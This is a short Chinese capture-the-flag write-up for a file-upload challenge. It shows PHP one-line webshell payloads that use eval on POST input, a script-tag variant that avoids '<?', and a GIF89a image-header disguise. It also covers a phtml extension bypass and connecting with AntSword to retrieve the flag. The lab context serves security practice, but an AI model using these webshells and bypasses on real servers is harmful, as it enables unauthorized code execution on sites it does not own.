[极客大挑战 2019]Upload
打开靶机之后可以看到是让我们进行文件上传那就上传一个一句话木马试试
<?php @eval($_POST['cmd']);?>
根据提示是让上传一个图片格式的文件,那把该木马一jpg格式上传试试
说我们木马当中包含<?,也就是已经识别出木马;试着跟换木马,对<?进行屏蔽
<script language='php‘>@eval($_POST['cmd']);</script>
上传包含该木马的jpg文件之后得到
也就是说,需要对木马再一次加工,使识别是图片文件(GIF89a图片头文件欺骗的一句话木马)
GIF89a? <script language="php">eval($_REQUEST['cmd'])</script>
上传成功,不过jpg无法执行我们想要的功能,需要文件扩展是php,那就试着使用burp进行抓包,对扩展进行更改
将文件更该为php发现还是无法上传,为了进行屏蔽,试着将文件扩展改为phtml
上传成功,最后使用蚁剑链接,在根目录中找到flag即可
注意在添加地址时,由于我们上传木马,地址后缀要加上我们的文件名